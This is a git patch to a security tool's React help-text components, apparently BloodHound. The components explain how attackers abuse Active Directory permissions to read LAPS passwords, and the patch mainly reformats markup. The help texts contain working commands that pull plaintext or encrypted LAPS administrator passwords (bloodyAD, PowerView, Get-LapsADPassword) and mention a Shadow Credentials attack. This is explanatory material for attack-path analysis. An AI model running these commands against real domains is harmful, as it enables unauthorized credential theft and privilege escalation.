a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx index d29cc06d31..2be67f59cc 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx @@ -21,14 +21,14 @@ import { EdgeInfoProps } from '../index'; const LinuxAbuse: FC = () => { return ( <> - - Read the LAPS password attributes listed in the General section. - + Read the LAPS password attributes listed in the General section. Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + { + "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime" + } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx index 5d4fbd1b43..9c3b8b29da 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx @@ -31,16 +31,22 @@ const References: FC = () => { https://adsecurity.org/?p=3164
- - https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
- - https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
- https://github.com/CravateRouge/bloodyAD + https://github.com/CravateRouge/bloodyAD
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx index bb0f6edb9c..5f59712188 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx @@ -21,9 +21,7 @@ import { EdgeInfoProps } from '../index'; const WindowsAbuse: FC = () => { return ( <> - - Read the LAPS password attributes listed in the General section. - + Read the LAPS password attributes listed in the General section. Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: @@ -34,14 +32,17 @@ const WindowsAbuse: FC = () => { Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - {'Get-LapsADPassword "WIN10" -AsPlainText'} - + {'Get-LapsADPassword "WIN10" -AsPlainText'} - The encrypted attributes can also be retrieved and decrypted using - lapsv2decrypt - {' '} (dotnet or BOF). + The encrypted attributes can also be retrieved and decrypted using{' '} + + lapsv2decrypt + {' '} + (dotnet or BOF). ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx index ecee39a884..2b29680425 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx @@ -230,7 +230,8 @@ const LinuxAbuse: FC = ( Retrieve LAPS Password - The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. + The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) + password for {targetName}. For systems using legacy LAPS, the following AD computer object properties are relevant: @@ -240,8 +241,9 @@ const LinuxAbuse: FC = ( - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -251,16 +253,19 @@ const LinuxAbuse: FC = (
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + { + "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime" + } See Windows abuse for retrieving and decrypting the encrypted attributes. diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx index d5ee5e9800..9f386d67c6 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx @@ -155,16 +155,22 @@ const References: FC = () => { https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
- - https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
- - https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
- https://github.com/CravateRouge/bloodyAD + https://github.com/CravateRouge/bloodyAD ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx index c5bdb87db4..7880ad1395 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx @@ -307,8 +307,9 @@ const WindowsAbuse: FC = - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -318,27 +319,33 @@ const WindowsAbuse: FC =
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: - {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + { + 'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"' + } Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - {'Get-LapsADPassword "WIN10" -AsPlainText'} - + {'Get-LapsADPassword "WIN10" -AsPlainText'} - The encrypted attributes can also be retrieved and decrypted using - lapsv2decrypt - {' '} (dotnet or BOF). + The encrypted attributes can also be retrieved and decrypted using{' '} + + lapsv2decrypt + {' '} + (dotnet or BOF). Shadow Credentials attack diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx index d5380109a7..fc819c339f 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx @@ -250,7 +250,8 @@ const LinuxAbuse: FC = ({ sourceName, targ Retrieve LAPS Password - The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. + The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) + password for {targetName}. For systems using legacy LAPS, the following AD computer object properties are relevant: @@ -260,8 +261,9 @@ const LinuxAbuse: FC = ({ sourceName, targ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -271,16 +273,19 @@ const LinuxAbuse: FC = ({ sourceName, targ
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + { + "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime" + } See Windows abuse for retrieving and decrypting the encrypted attributes. diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx index 05b24c4fa8..f4b0138634 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx @@ -100,16 +100,22 @@ const References: FC = () => { https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
- - https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
- - https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
- https://github.com/CravateRouge/bloodyAD + https://github.com/CravateRouge/bloodyAD ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx index ce81766ea8..ed99c93d67 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx @@ -382,7 +382,8 @@ const WindowsAbuse: FC =
- For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -392,27 +393,33 @@ const WindowsAbuse: FC =
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: - {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + { + 'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"' + } Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - {'Get-LapsADPassword "WIN10" -AsPlainText'} - + {'Get-LapsADPassword "WIN10" -AsPlainText'} - The encrypted attributes can also be retrieved and decrypted using - lapsv2decrypt - {' '} (dotnet or BOF). + The encrypted attributes can also be retrieved and decrypted using{' '} + + lapsv2decrypt + {' '} + (dotnet or BOF). Shadow Credentials attack From 563d444a442dac9cf0b9832cb0cf05fcd448570e Mon Sep 17 00:00:00 2001 From: jknudsen Date: Mon, 16 Dec 2024 12:40:33 +0100 Subject: [PATCH 3/4] fix ReadLAPSPassword General info --- .../HelpTexts/ReadLAPSPassword/General.tsx | 28 +++++++++++++------ 1 file changed, 19 insertions(+), 9 deletions(-) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx index 96b57895ae..9c7db79faa 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx @@ -27,18 +27,28 @@ const General: FC = ({ sourceName, sourceType, targetName }) => { Password Solution (LAPS) on the computer {targetName}.
- For systems using legacy LAPS, the following AD computer object properties are relevant: - - **ms-Mcs-AdmPwd**: The plaintext LAPS password. - **ms-Mcs-AdmPwdExpirationTime**: The LAPS password - expiration time. + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
- For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: - - **msLAPS-Password**: The plaintext LAPS password. - **msLAPS-PasswordExpirationTime**: The LAPS - password expiration time. - **msLAPS-EncryptedPassword**: The encrypted LAPS password. - - **msLAPS-EncryptedPasswordHistory**: The encrypted LAPS password history. - - **msLAPS-EncryptedDSRMPassword**: The encrypted Directory Services Restore Mode (DSRM) password. - - **msLAPS-EncryptedDSRMPasswordHistory**: The encrypted DSRM password history. +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
); From 3bf265ae401193b2e1f9172748bde3fbfa394092 Mon Sep 17 00:00:00 2001 From: jknudsen Date: Mon, 16 Dec 2024 12:52:27 +0100 Subject: [PATCH 4/4] remove unused haslaps property --- .../components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx | 2 +- .../HelpTexts/AllExtendedRights/WindowsAbuse.tsx | 8 +------- 2 files changed, 2 insertions(+), 8 deletions(-) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx index cace7b88e1..8d494a4d68 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx @@ -18,7 +18,7 @@ import { FC } from 'react'; import { EdgeInfoProps } from '../index'; import { Link, Typography } from '@mui/material'; -const LinuxAbuse: FC = ({ sourceName, targetName, targetType, haslaps }) => { +const LinuxAbuse: FC = ({ sourceName, targetName, targetType }) => { switch (targetType) { case 'User': return ( diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/WindowsAbuse.tsx index 62c6bab10e..69b9e6a1ed 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/WindowsAbuse.tsx @@ -18,13 +18,7 @@ import { FC } from 'react'; import { Link, Typography } from '@mui/material'; import { EdgeInfoProps } from '../index'; -const WindowsAbuse: FC = ({ - sourceName, - sourceType, - targetName, - targetType, - haslaps, -}) => { +const WindowsAbuse: FC = ({ sourceName, sourceType, targetName, targetType }) => { switch (targetType) { case 'User': return (